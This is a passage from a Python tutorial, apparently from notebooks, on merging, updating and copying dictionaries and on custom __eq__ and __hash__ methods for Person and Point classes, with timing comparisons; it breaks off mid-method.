First let's consider how we would identify the non-common keys.

Start with the union of the keys - this identifies all unique keys in both dictionaries:

In [40]:
union = d1.keys() | d2.keys()
print(union)

{'a', 'b', 'e', 'c', 'd'}


Next, we look at the intersection of the keys - this identifies all keys common to both dictionaries:

In [41]:
intersection = d1.keys() & d2.keys()
print(intersection)

{'a', 'b', 'c'}


Finally, we can remove the keys in the intersection from the keys in the union:

In [42]:
keys = union - intersection
print(keys)

{'e', 'd'}


As you can see we now have the keys we are interested in.
All that's left is to pick up the values as well.

(We'll cover this later in the section on sets, but there's a quicker way to get this, using something called a symmetric difference.)

First note that given a key, it will be present in either `d1` or `d2`, but not both.
So to get the value for the key we need to look at both dictionaries and pick the value from whichever dictionary has the key:

In [43]:
value = d1.get('e')
print(value)

None


In [44]:
value = d2.get('e')
print(value)

5


So, we can combine these two expressions with an `or` to get the non-`None` value (one of them will always be `None`):

In [45]:
d1.get('d') or d2.get('d')

4

In [46]:
d1.get('e') or d2.get('e')

5

So now we need to use this to gather up the values for our keys and create a result dictionary:

We could do it using a standard loop:

In [47]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'a': 10, 'b': 20, 'c': 30, 'e': 5}
union = d1.keys() | d2.keys()
intersection = d1.keys() & d2.keys()
keys = union - intersection

result = {}
for key in keys:
    result[key] = d1.get(key) or d2.get(key)
print(result)

{'e': 5, 'd': 4}


Or, better yet, we could use a dictionary comprehension:

In [48]:
result = {key: d1.get(key) or d2.get(key) for key in keys}
print(result)

{'e': 5, 'd': 4}


Just for completeness, and again, we'll cover this in detail later, we can use the symmetric difference operator for sets (`^`) which does in one operation the same thing we did with the union, intersection, and difference operators, making this even more concise:

In [49]:
d1 = {'a': 1, 'b': 2, 'c': 3, 'd': 4}
d2 = {'a': 10, 'b': 20, 'c': 30, 'e': 5}
result = {key: d1.get(key) or d2.get(key)
         for key in d1.keys() ^ d2.keys()}
print(result)

{'e': 5, 'd': 4}
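
One caveat with the `or` idiom used in this example: it picks the first **truthy** operand, so it gives the wrong answer if a value is falsy, such as `0` or an empty string. Here is a sketch with modified sample data (`'d': 0`) that shows the problem, along with one possible alternative that tests for membership explicitly:

```python
d1 = {'a': 1, 'b': 2, 'd': 0}  # note the falsy value for 'd'
d2 = {'a': 10, 'b': 20, 'e': 5}

keys = d1.keys() ^ d2.keys()

# 0 is falsy, so the `or` falls through to d2.get('d'), which is None
with_or = {key: d1.get(key) or d2.get(key) for key in keys}

# Testing membership does not depend on the truthiness of the value
explicit = {key: d1[key] if key in d1 else d2[key] for key in keys}

print(with_or == {'d': None, 'e': 5})  # True
print(explicit == {'d': 0, 'e': 5})    # True
```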


##  Updating, Merging and Copying

Updating an existing key's value in a dictionary is straightforward:

In [1]:
d = {'a': 1, 'b': 2, 'c': 3}

In [2]:
d['b'] = 200

In [3]:
d

{'a': 1, 'b': 200, 'c': 3}

#### The `update` method

Sometimes however, we want to update all the items in one dictionary based on items in another dictionary.

For that we can use the `update` method.

The `update` method has three forms:
1. it can take another dictionary
2. it can take an iterable of iterables of length 2 (key, value)
3. it can take keyword arguments

You'll notice that the arguments we can use with `update` are very similar to the types of arguments we can use with the `dict()` function when we create dictionaries.

Let's look briefly at each of those forms:

In [4]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}

In [5]:
d1.update(d2)
print(d1)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}


Note how the key order is maintained and based on the order in which the dictionaries were created/updated.

In [6]:
d1 = {'a': 1, 'b': 2}

In [7]:
d1.update(b=20, c=30)
print(d1)

{'a': 1, 'b': 20, 'c': 30}


Again notice how the key order reflects the order in which the parameters were specified when calling the `update` method.

In [8]:
d1 = {'a': 1, 'b': 2}

In [9]:
d1.update([('c', 2), ('d', 3)])

In [10]:
d1

{'a': 1, 'b': 2, 'c': 2, 'd': 3}

Of course we can use more complex iterables. For example we could use a generator expression:

In [11]:
d = {'a': 1, 'b': 2}
d.update((k, ord(k)) for k in 'python')
print(d)

{'a': 1, 'b': 2, 'p': 112, 'y': 121, 't': 116, 'h': 104, 'o': 111, 'n': 110}


So far we have updated dictionaries with other dictionaries or iterables that do not contain the same keys. When the keys do overlap, the corresponding key in the dictionary being updated has its associated value replaced by the new value:

In [12]:
d1 = {'a': 1, 'b': 2, 'c': 3}
d2 = {'b': 200, 'd': 4}
d1.update(d2)
print(d1)

{'a': 1, 'b': 200, 'c': 3, 'd': 4}
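
Two details that are easy to miss: `update` mutates the dictionary in place and returns `None`, and a positional argument can be combined with keyword arguments in a single call. A short sketch with made-up values:

```python
d = {'a': 1, 'b': 2}

# positional iterable of pairs and keyword arguments in the same call;
# the keyword arguments are applied after the positional argument
result = d.update([('b', 20), ('c', 30)], c=300, d=400)

print(result)  # None - update works in place
print(d)       # {'a': 1, 'b': 20, 'c': 300, 'd': 400}
```

Because `update` returns `None`, writing `d = d.update(...)` is a common mistake that silently discards the dictionary.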


#### Unpacking dictionaries

We can also use unpacking to unpack the contents of one dictionary into the elements of another dictionary. This is very similar to how we can unpack iterables. Let's recall that first:

In [13]:
l1 = [1, 2, 3]
l2 = 'abc'
l = (*l1, *l2)
print(l)

(1, 2, 3, 'a', 'b', 'c')


We can do something similar with dictionaries:

In [14]:
d1 = {'a': 1, 'b': 2}
d2 = {'c': 3, 'd': 4}
d = {**d1, **d2}
print(d)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}


Again note how order is preserved.
What happens when there are conflicting keys in the unpacking?

In [15]:
d1 = {'a': 1, 'b': 2}
d2 = {'b': 200, 'c': 3}
d = {**d1, **d2}
print(d)

{'a': 1, 'b': 200, 'c': 3}


As you can see, the 'last' key/value pair wins.

Now the nice thing about unpacking is that we are not limited to just two dictionaries.

##### Example

In this example we have some dictionaries we use to configure our application.
One dictionary specifies some configuration defaults for every configuration parameter our application will need.
Another dictionary is used to configure some global configuration, and another set of dictionaries is used to define environment specific configurations, maybe dev and prod.

In [16]:
conf_defaults = dict.fromkeys(('host', 'port', 'user', 'pwd', 'database'), None)
print(conf_defaults)

{'host': None, 'port': None, 'user': None, 'pwd': None, 'database': None}


In [17]:
conf_global = {
    'port': 5432,
    'database': 'deepdive'}

In [18]:
conf_dev = {
    'host': 'localhost',
    'user': 'test',
    'pwd': 'test'
}

conf_prod = {
    'host': 'prodpg.deepdive.com',
    'user': '$prod_user',
    'pwd': '$prod_pwd',
    'database': 'deepdive_prod'
}

Now we can generate a full configuration for our dev environment this way:

In [19]:
config_dev = {**conf_defaults, **conf_global, **conf_dev}

In [20]:
print(config_dev)

{'host': 'localhost', 'port': 5432, 'user': 'test', 'pwd': 'test', 'database': 'deepdive'}


and a config for our prod environment:

In [21]:
config_prod = {**conf_defaults, **conf_global, **conf_prod}

In [22]:
print(config_prod)

{'host': 'prodpg.deepdive.com', 'port': 5432, 'user': '$prod_user', 'pwd': '$prod_pwd', 'database': 'deepdive_prod'}
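
Since the same layering pattern is repeated for each environment, it could be wrapped in a small helper. This is only a sketch: `merge_configs` is a hypothetical name, and the dictionaries are re-declared here so the example is self-contained.

```python
def merge_configs(*layers):
    """Merge dictionaries left to right; later layers override earlier ones."""
    merged = {}
    for layer in layers:
        # unpack what we have so far, then the next layer on top of it
        merged = {**merged, **layer}
    return merged


conf_defaults = dict.fromkeys(('host', 'port', 'user', 'pwd', 'database'), None)
conf_global = {'port': 5432, 'database': 'deepdive'}
conf_dev = {'host': 'localhost', 'user': 'test', 'pwd': 'test'}

config_dev = merge_configs(conf_defaults, conf_global, conf_dev)
print(config_dev)
```

The input dictionaries are left untouched, since each step builds a new dictionary.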


##### Example

Dictionary unpacking is also really useful for passing keyword arguments to a function:

In [23]:
def my_func(*, kw1, kw2, kw3):
    print(kw1, kw2, kw3)

In [24]:
d = {'kw2': 20, 'kw3': 30, 'kw1': 10}

In this case, we don't really care about the order of the elements, since we'll be unpacking keyword arguments:

In [25]:
my_func(**d)

10 20 30


Of course we can even use it this way, but here the dictionary order does matter, as it will be reflected in the order in which those arguments are passed to the function:

In [26]:
def my_func(**kwargs):
    for k, v in kwargs.items():
        print(k, v)

In [27]:
my_func(**d)

kw2 20
kw3 30
kw1 10


As you can see the function's `kwargs` dictionary received the elements in the same order as the original dictionary we unpacked.

#### Copying Dictionaries

We can make copies of dictionaries. But as with iterables, we have to differentiate between **shallow** and **deep** copies.

The `copy` method that dictionaries implement is a shallow copy mechanism.
This means that a new container is created, but the item references within the collection are maintained.

Let's see a simple example:

In [28]:
d = {'a': [1, 2], 'b': [3, 4]}

In [29]:
d1 = d.copy()

In [30]:
print(d)
print(d1)

{'a': [1, 2], 'b': [3, 4]}
{'a': [1, 2], 'b': [3, 4]}


In [31]:
id(d), id(d1), d is d1

(4367368768, 4367467576, False)

`d` and `d1` are not the same object, so we can add and remove keys from one dict without affecting the other. We can also completely replace an associated value in one without affecting the other.

In [32]:
del d['a']

In [33]:
print(d)
print(d1)

{'b': [3, 4]}
{'a': [1, 2], 'b': [3, 4]}


In [34]:
d['b'] = 100

In [35]:
print(d)
print(d1)

{'b': 100}
{'a': [1, 2], 'b': [3, 4]}


But let's see what happens if we mutate the value of one dictionary:

In [36]:
d = {'a': [1, 2], 'b': [3, 4]}
d1 = d.copy()
print(d)
print(d1)

{'a': [1, 2], 'b': [3, 4]}
{'a': [1, 2], 'b': [3, 4]}


In [37]:
d['a'].append(100)

In [38]:
print(d)

{'a': [1, 2, 100], 'b': [3, 4]}


In [39]:
print(d1)

{'a': [1, 2, 100], 'b': [3, 4]}


As you can see the mutation was also "seen" by `d1`. This is because `d['a']` and `d1['a']` are in fact the **same** object.

In [40]:
d['a'] is d1['a']

True

So if we have nested dictionaries for example, as is often the case with JSON documents, we have to be careful when creating shallow copies.

In [41]:
d = {'id': 123445,
    'person': {
        'name': 'John',
        'age': 78},
     'posts': [100, 105, 200]
    }

In [42]:
d1 = d.copy()

In [43]:
d1['person']['name'] = 'John Cleese'
d1['posts'].append(300)

In [44]:
d1

{'id': 123445,
 'person': {'name': 'John Cleese', 'age': 78},
 'posts': [100, 105, 200, 300]}

In [45]:
d

{'id': 123445,
 'person': {'name': 'John Cleese', 'age': 78},
 'posts': [100, 105, 200, 300]}

If we want to avoid this issue, we have to create a **deep** copy.
We can easily do this ourselves using recursion, but the `copy` module implements such a function for us:

In [46]:
from copy import deepcopy

In [47]:
d = {'id': 123445,
    'person': {
        'name': 'John',
        'age': 78},
     'posts': [100, 105, 200]
    }

In [48]:
d1 = deepcopy(d)

In [49]:
d1['person']['name'] = 'John Cleese'
d1['posts'].append(300)

In [50]:
d1

{'id': 123445,
 'person': {'name': 'John Cleese', 'age': 78},
 'posts': [100, 105, 200, 300]}

In [51]:
d

{'id': 123445, 'person': {'name': 'John', 'age': 78}, 'posts': [100, 105, 200]}
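
The recursive approach mentioned above could look something like the sketch below. `simple_deepcopy` is a hypothetical helper that only handles nested dictionaries and lists (the shapes that typically come out of a JSON document). Unlike `copy.deepcopy`, it does not handle other containers, custom classes, or circular references.

```python
def simple_deepcopy(obj):
    """Recursively copy nested dicts and lists; other objects are returned as-is."""
    if isinstance(obj, dict):
        return {key: simple_deepcopy(value) for key, value in obj.items()}
    if isinstance(obj, list):
        return [simple_deepcopy(item) for item in obj]
    # anything else (ints, strings, ...) is assumed immutable and is shared
    return obj


d = {'id': 123445,
     'person': {'name': 'John', 'age': 78},
     'posts': [100, 105, 200]}

d1 = simple_deepcopy(d)
d1['person']['name'] = 'John Cleese'
d1['posts'].append(300)

print(d['person']['name'])  # John
print(d['posts'])           # [100, 105, 200]
```

In practice `deepcopy` is the safer choice, precisely because it deals with the cases this sketch ignores.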

We saw earlier that we can also copy a dictionary by essentially unpacking the keys of one, or more dictionaries, into another.
This also creates a **shallow** copy:

In [52]:
d1 = {'a': [1, 2], 'b':[3, 4]}
d = {**d1}

In [53]:
d

{'a': [1, 2], 'b': [3, 4]}

In [54]:
d1['a'].append(100)

In [55]:
d1

{'a': [1, 2, 100], 'b': [3, 4]}

In [56]:
d

{'a': [1, 2, 100], 'b': [3, 4]}

At this point you're probably asking yourself whether to use `**` or `.copy()` to create a shallow copy. We can even create a shallow copy of a dict by passing the dict to the `dict()` constructor.

Firstly, the `**` unpacking is more flexible because you can unpack multiple dictionaries into a single new one - `copy` is restricted to copying a single dictionary.

But what about timings? Is one faster than the other?

What about using a dictionary comprehension to copy a dictionary? Is that faster/slower?

Let's try it out and see:

In [57]:
from random import randint

big_d = {k: randint(1, 100) for k in range(1_000_000)}

In [58]:
def copy_unpacking(d):
    d1 = {**d}
    
def copy_copy(d):
    d1 = d.copy()

def copy_create(d):
    d1 = dict(d)
    
def copy_comprehension(d):
    d1 = {k: v for k, v in d.items()}

In [59]:
from timeit import timeit

In [60]:
timeit('copy_unpacking(big_d)', globals=globals(), number=100)

2.480969894968439

In [61]:
timeit('copy_copy(big_d)', globals=globals(), number=100)

2.469855136005208

In [62]:
timeit('copy_create(big_d)', globals=globals(), number=100)

2.4125180219998583

In [63]:
timeit('copy_comprehension(big_d)', globals=globals(), number=100)

5.77224236400798

So, creating, unpacking and `.copy()` are about the same - certainly not significant enough to be concerned. A comprehension on the other hand is substantially slower - so, don't use comprehension syntax to do a simple shallow copy!

##  Custom Classes and Hashing

We know that in order for an object to be usable as a key in a dictionary, it must be hashable.
In general Python will not allow mutable types to be hashable. I explained why in previous lectures, but it boils down to key retrieval. 

To retrieve a key/value from a dictionary, we start with the hash of the key, mod (`%`) the size of the dictionary (allocated, not in-use). From that a sequence of search indices is generated (the probe sequence). Python then follows this probe sequence one by one, comparing the requested key with the key at that index, using `==` comparisons (technically it first compares the hashes themselves, and if they are equal then also compares the keys). If it finds a key which compares equal then it returns that item, otherwise it continues the probe sequence until it either finds the key or sees an empty slot (which means the key does not exist in the dictionary) and bails out of the search.

If we allowed the key to change, then even if it had the same hash (and hence the same probe sequence), Python would not find it unless it still compared equal.

So technically it is not required that the key be immutable, what is required is that the hash and equality of the key does not change!
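
To make the lookup procedure more concrete, here is a deliberately simplified model. It is not how CPython is implemented: the table size is fixed, the probe sequence is plain linear probing (CPython uses a more elaborate scheme), and the names `TABLE_SIZE`, `probe_sequence`, `insert` and `lookup` are made up for this illustration.

```python
TABLE_SIZE = 8
table = [None] * TABLE_SIZE  # each slot holds None or a (hash, key, value) entry


def probe_sequence(key_hash):
    """Yield the slot indices to try, starting at hash mod table size."""
    start = key_hash % TABLE_SIZE
    for offset in range(TABLE_SIZE):
        yield (start + offset) % TABLE_SIZE


def insert(key, value):
    key_hash = hash(key)
    for index in probe_sequence(key_hash):
        entry = table[index]
        # use the slot if it is empty or already holds an equal key
        if entry is None or (entry[0] == key_hash and entry[1] == key):
            table[index] = (key_hash, key, value)
            return
    raise RuntimeError('table is full')


def lookup(key):
    key_hash = hash(key)
    for index in probe_sequence(key_hash):
        entry = table[index]
        if entry is None:
            # empty slot: the key cannot be further along the probe sequence
            raise KeyError(key)
        # compare the hashes first (cheap), then the keys themselves
        if entry[0] == key_hash and entry[1] == key:
            return entry[2]
    raise KeyError(key)


insert(1, 'one')
insert(9, 'nine')      # 9 % 8 == 1, so this collides with the key 1
insert((1, 2), 'pair')

print(lookup(1))       # one
print(lookup(9))       # nine
print(lookup((1, 2)))  # pair
```

If a stored key's hash or equality changed after insertion, `lookup` would either start at the wrong slot or fail the `==` test at the right one, which is exactly the problem described above.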

Remember the difference between equality (`==`) and identity (`is`):

In [1]:
t1 = (1, 2, 3)

In [2]:
t2 = (1, 2, 3)

In [3]:
t1 is t2

False

In [4]:
t1 == t2

True

In [5]:
d = {t1: 100}

In [6]:
d[t1]

100

In [7]:
d[t2]

100

As you can see, even though `t1` and `t2` are different **objects**, we can still retrieve the element from the dictionary using either one - because they compare **equal** to each other, and, in fact, **have the same hash** as well:

In [8]:
hash(t1), hash(t2)

(2528502973977326415, 2528502973977326415)

One of the basic premises of hashes is that if two objects compare equal, they must have the same hash.
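
The built-in numeric types illustrate this rule nicely: `1`, `1.0` and `True` are different objects of different types, but they compare equal, so they have the same hash and act as the same dictionary key:

```python
print(1 == 1.0 == True)                    # True
print(hash(1) == hash(1.0) == hash(True))  # True

d = {1: 'int key'}
d[1.0] = 'float key'   # equal to the existing key, so the value is replaced
d[True] = 'bool key'   # same again

print(d)  # {1: 'bool key'}
```

Notice that the original key object (`1`) is kept; only the associated value is replaced.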

What happens when we create custom objects? Are these hashable?
The answer is yes - but our objects could be mutable, how does Python create a hash for these objects then?
It uses the memory address (`id`) of the object to compute a hash.

Also, by default, different instances of a custom class will never compare equal, since the default equality compares memory addresses.

In [9]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [10]:
p1 = Person('John', 78)
p2 = Person('John', 78)

In [11]:
id(p1), id(p2)

(4359101128, 4359101072)

In [12]:
p1 == p2

False

In [13]:
hash(p1), hash(p2)

(-9223372036582331988, 272443817)

Because of this default hash calculation, we can actually use custom objects as keys in dictionaries:

In [14]:
p1 = Person('John', 78)
p2 = Person('Eric', 75)
persons = {p1: 'John object', p2: 'Eric object'}

In [15]:
for k in persons.keys():
    print(k)

Person(name=John, age=78)
Person(name=Eric, age=75)


The problem here is that the **only** way to retrieve John for example, is to request the **original** object as the key (since any other instance, even with the same attribute values would not be equal):

In [16]:
persons[p1]

'John object'

But we cannot retrieve it this way:

In [17]:
p = Person('John', 78)
print(p, id(p))
print(p1, id(p1))

Person(name=John, age=78) 4359141472
Person(name=John, age=78) 4359139736


As you can see they are not the **same** object, they do not compare equal, and their hash is not the same:

In [18]:
p == p1, hash(p), hash(p1)

(False, 272446342, -9223372036582329575)

And so:

In [19]:
persons.get(p, 'not found')

'not found'

This may not be the behavior we want - we might want to be able to retrieve John from the dictionary as long as the contents (or some of the contents) match. In other words, we need to decide when two `Person` instances should be considered **equal**.

To do this we would start by implementing an `__eq__` method in our class:

In [20]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False

In [21]:
p1 = Person('John', 78)
p2 = Person('John', 78)

In [22]:
p1 == p2

True

OK, that's great, so let's put `p1` in a dictionary and see if we can recover it using `p2`, which evaluates to equal to `p1`:

In [23]:
persons = {p1: 'John p1'}

TypeError: unhashable type: 'Person'

Huh? Why is a Person instance suddenly unhashable?

In [25]:
hash(p1)

TypeError: unhashable type: 'Person'

The only thing we changed is we implemented the `__eq__` method. Let's just check:

In [26]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'

In [27]:
hash(Person('John', 78))

272445213

In [28]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False

In [29]:
hash(Person('John', 78))

TypeError: unhashable type: 'Person'

Yes, that's the reason... But why?

Remember what I said earlier, if two objects compare equal (`==`) then their hash should also compare equal.

`p1` and `p2` are distinct objects, but they now compare equal, and if their hash was based on their `id` they would not have equal hashes!

When we implement an `__eq__` method on a class, Python will no longer provide a default hash. Instead it automatically indicates that the class is not hashable.

There is a special method `__hash__` which is used by Python when we call the `hash()` function. If that `__hash__` attribute **is** `None` then Python considers the object unhashable (note I am not saying the `__hash__` function returns `None`, I am saying it should just **be** `None`).

In [30]:
hash_func = Person.__hash__
print(hash_func)

None


Notice how the `__hash__` attribute is `None` - it is not a function that returns `None`.

In fact, we could have done this explicitly ourselves as well:

In [31]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False
    
    __hash__ = None

In [32]:
hash(Person('John', 78))

TypeError: unhashable type: 'Person'

In fact we can use this technique to mark a custom class, even if it does not implement an `__eq__` method as unhashable:

In [33]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    __hash__ = None

In [34]:
hash(Person('John', 78))

TypeError: unhashable type: 'Person'
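
If we want to check for hashability without triggering an exception, one option is `collections.abc.Hashable`, whose `isinstance` check looks at whether the class has a `__hash__` that is not `None`. A small sketch, with made-up class names:

```python
from collections.abc import Hashable


class WithDefaultHash:
    pass


class WithEqOnly:
    # defining __eq__ without __hash__ makes Python set __hash__ to None
    def __eq__(self, other):
        return isinstance(other, WithEqOnly)


class ExplicitlyUnhashable:
    __hash__ = None


print(isinstance(WithDefaultHash(), Hashable))       # True
print(isinstance(WithEqOnly(), Hashable))            # False
print(isinstance(ExplicitlyUnhashable(), Hashable))  # False
```

Keep in mind this is a class-level check: `isinstance(([1, 2],), Hashable)` is `True` even though calling `hash()` on that tuple raises a `TypeError`.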

In this case though, we do want Person instances to be hashable so we can recover Person keys in our dictionary based on whether the objects compare equal or not.
In this case we simply want to create a hash based on `name` and `age`. Since both of these values are themselves hashable it turns out to be pretty easy to do:

In [35]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False
    
    def __hash__(self):
        print('__hash__ called...')
        return hash((self.name, self.age))

In [36]:
p1 = Person('John', 78)
p2 = Person('John', 78)
print(p1 is p2)
print(p1 == p2)
print(hash(p1) == hash(p2))

False
True
__hash__ called...
__hash__ called...
True


As you can see, `Person` objects are now hashable, and equal objects have equal hashes. Of course, if the objects are not equal they usually will have different hashes (though that is not mandatory - we'll come back to that in a bit).

In [37]:
p3 = Person('Eric', 75)

In [38]:
print(p1 == p3)
print(hash(p1) == hash(p3))

False
__hash__ called...
__hash__ called...
False


Let's quickly remove that print statement:

In [39]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False
    
    def __hash__(self):
        return hash((self.name, self.age))

Now let's see how this works with dictionaries:

In [40]:
p1 = Person('John', 78)
p2 = Person('John', 78)
p3 = Person('Eric', 75)

In [41]:
persons = {p1: 'first John object'}

In [42]:
persons[p1]

'first John object'

In [43]:
persons[p2]

'first John object'

In [44]:
persons[p3]

KeyError: Person(name=Eric, age=75)

Now let's try to add `p2` to the dictionary:

In [45]:
persons[p2] = 'other (equal) John object'

In [46]:
persons

{Person(name=John, age=78): 'other (equal) John object'}

As you can see, we actually just overwrote the value of that key - since those two keys are in fact equal (`==`).

So we could not do this:

In [47]:
persons = {p1: 'p1', p2: 'p2'}

In [48]:
persons

{Person(name=John, age=78): 'p2'}

As you can see the key was considered the same, and hence the last value assignment was effective.

But of course we could do this:

In [49]:
persons = {p1: 'p1', p3: 'p3'}

In [50]:
persons

{Person(name=John, age=78): 'p1', Person(name=Eric, age=75): 'p3'}

since `p1` and `p3` are not equal (`==`).

##### A subtle point about `__hash__` and `hash()`

The `__hash__` method must return an integer - Python will complain otherwise:

In [51]:
class Test:
    def __hash__(self):
        return 'a string'

In [52]:
hash(Test())

TypeError: __hash__ method should return an integer

Just out of interest:

When we call the `hash()` function, although it in turn calls the `__hash__` method, it does something more.

It will truncate the integer returned by `__hash__` to a certain width which is implementation dependent.

In my case, I can see that hashes will be truncated to 64-bits:

In [53]:
import sys
sys.hash_info.width

64

Let's just see how that affects the results of our `__hash__` method:

In [54]:
class Test:
    def __hash__(self):
        return 1_000_000_000_000_000_000

In [55]:
hash(Test())

1000000000000000000

In [56]:
class Test:
    def __hash__(self):
        return 10_000_000_000_000_000_000

In [57]:
hash(Test())

776627963145224196

In [58]:
mod = sys.hash_info.modulus

In [59]:
mod

2305843009213693951

In [60]:
10_000_000_000_000_000_000 % mod

776627963145224196
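
The results above are consistent with how CPython treats integers in general: the hash of an integer is computed modulo `sys.hash_info.modulus`, and an oversized `__hash__` result ends up with the same hash as that integer itself. This is an implementation detail rather than a language guarantee, so treat the sketch below as an observation about CPython (the name `BIG` is made up):

```python
import sys

BIG = 10_000_000_000_000_000_000   # too large for a 64-bit signed integer


class Test:
    def __hash__(self):
        return BIG


modulus = sys.hash_info.modulus

print(hash(BIG) == BIG % modulus)   # True on CPython
print(hash(Test()) == hash(BIG))    # True on CPython
```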

##### Back to equal hashes for unequal objects

As we have seen many times now, hash functions and hashable objects need to satisfy these conditions:
1. if `a == b` then `hash(a) == hash(b)`
2. `hash(a)` must be an integer

But nothing specifies here that unequal objects must result in unequal hashes.

The only issue with equal hashes for unequal objects is that we end up getting more collisions when looking up a key in a dictionary (refer to the earlier theory section if you want more details on this).

So, let's try it out with our `Person` class, we are going to implement a hash that is going to be a constant integer. That will still satisfy conditions (1) and (2) above:

In [61]:
class Person:
    def __init__(self, name, age):
        self.name = name
        self.age = age
        
    def __repr__(self):
        return f'Person(name={self.name}, age={self.age})'
    
    def __eq__(self, other):
        if isinstance(other, Person):
            return self.name == other.name and self.age == other.age
        else:
            return False
    
    def __hash__(self):
        return 100

In [62]:
p1 = Person('John', 78)
p2 = Person('Eric', 75)

In [63]:
hash(p1), hash(p2)

(100, 100)

In [64]:
p1 == p2

False

In [65]:
persons = {p1: 'p1', p2: 'p2'}

In [66]:
persons

{Person(name=John, age=78): 'p1', Person(name=Eric, age=75): 'p2'}

In [67]:
persons[p1]

'p1'

In [68]:
persons[p2]

'p2'

In [69]:
persons[Person('John', 78)]

'p1'

As you can see that still works just fine.
But let's see how performance is affected by this.
To test this we are going to create a slightly simpler class:

In [70]:
class Number:
    def __init__(self, x):
        self.x = x
        
    def __eq__(self, other):
        if isinstance(other, Number):
            return self.x == other.x
        else:
            return False
    
    def __hash__(self):
        return hash(self.x)        

In [71]:
class SameHash:
    def __init__(self, x):
        self.x = x
        
    def __eq__(self, other):
        if isinstance(other, SameHash):
            return self.x == other.x
        else:
            return False
    
    def __hash__(self):
        return 100   

In [72]:
numbers = {Number(i): 'some value' for i in range(1_000)}
same_hashes = {SameHash(i): 'some value' for i in range(1_000)}

In [73]:
numbers[Number(500)]

'some value'

In [74]:
same_hashes[SameHash(500)]

'some value'

And now let's time how long it takes to retrieve an element from each of those dictionaries:

In [75]:
from timeit import timeit

In [76]:
print(timeit('numbers[Number(500)]', globals=globals(), number=10_000))

0.008118819037918001


In [77]:
print(timeit('same_hashes[SameHash(500)]', globals=globals(), number=10_000))

1.0041481230291538


As you can see it takes substantially longer (by a factor of more than 100x) to look up a value when we have hash collisions.
In fact this is the reason why Python has randomized hashes for strings, dates, and a few other built-in types. If these hashes were predictable it would be easy for an attacker to purposefully provide keys with the same hash to slow down the system in a denial of service attack.

So, even though that constant value we provide for a hash is technically valid, I wouldn't recommend you use something like it!!
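
To see where that extra time goes, we can count how many `==` comparisons a single lookup triggers. The sketch below uses a hypothetical `CountingKey` class that can behave like either `Number` or `SameHash`; the counter and the helper function exist purely for illustration.

```python
class CountingKey:
    """Key that counts how many times __eq__ is called (illustration only)."""
    eq_calls = 0

    def __init__(self, x, constant_hash):
        self.x = x
        self.constant_hash = constant_hash

    def __eq__(self, other):
        CountingKey.eq_calls += 1
        return isinstance(other, CountingKey) and self.x == other.x

    def __hash__(self):
        # either every instance collides (100) or the hash depends on x
        return 100 if self.constant_hash else hash(self.x)


def eq_calls_for_lookup(constant_hash, n=1_000, target=500):
    d = {CountingKey(i, constant_hash): 'some value' for i in range(n)}
    CountingKey.eq_calls = 0          # ignore comparisons made while building
    d[CountingKey(target, constant_hash)]
    return CountingKey.eq_calls


good = eq_calls_for_lookup(constant_hash=False)
bad = eq_calls_for_lookup(constant_hash=True)
print(good, bad)
```

With distinct hashes a lookup needs a single equality check, whereas with a constant hash Python has to compare against many of the colliding keys before it finds the right one.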

#### Example

Let's take a look at another practical example of where we might want to use custom hashing.

Let's say we want to write a custom class to handle 2D coordinates:

In [78]:
class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y
        
    def __repr__(self):
        return f'({self.x}, {self.y})'

In [79]:
pt = Point(1, 2)
print(pt)

(1, 2)


In this case, we actually would like to be able to put these points as keys in a dictionary.
We certainly can as it is:

In [80]:
points = {Point(0,0): 'pt 1', Point(1,1): 'pt 2'}

But how do we recover the value for the point (0,0) for example?

In [81]:
points[Point(0,0)]

KeyError: (0, 0)

The problem of course is that Python is using a hash of the id of the points - so we need to implement a custom hash mechanism, and of course also the `__eq__` method (just because the hash of two objects is the same does not mean the objects are also equal, so to look up a key in a dictionary Python needs both a hash and equality).

In [82]:
class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y
        
    def __repr__(self):
        return f'({self.x}, {self.y})'
    
    def __eq__(self, other):
        if isinstance(other, Point):
            return self.x == other.x and self.y == other.y
        else:
            return False
        
    def __hash__(self):
        return hash((self.x, self.y))

In [83]:
points = {Point(0, 0): 'origin', Point(1,1): 'pt at (1,1)'}

In [84]:
points[Point(0,0)]

'origin'

As you can see we now have the desired functionality.

Let's actually take this a step further, and implement things in such a way that we could use a regular 2-element tuple to look up a point in the dictionary.

To do this we'll have to make sure that `(x, y) == Point(x, y)` and of course make sure that in that case we also have equal hashes - but since we are already calculating the hash of a Point as the hash of the corresponding tuple, we're already fine there.

In [85]:
class Point:
    def __init__(self, x, y):
        self.x = x
        self.y = y
        
    def __repr__(self):
        return f'({self.x}, {self.y})'
    
    def __eq__(self, other):
        if isinstance(other, tuple) and len(other) == 2:
            other = Point(*other)
        if isinstance(other, Point):
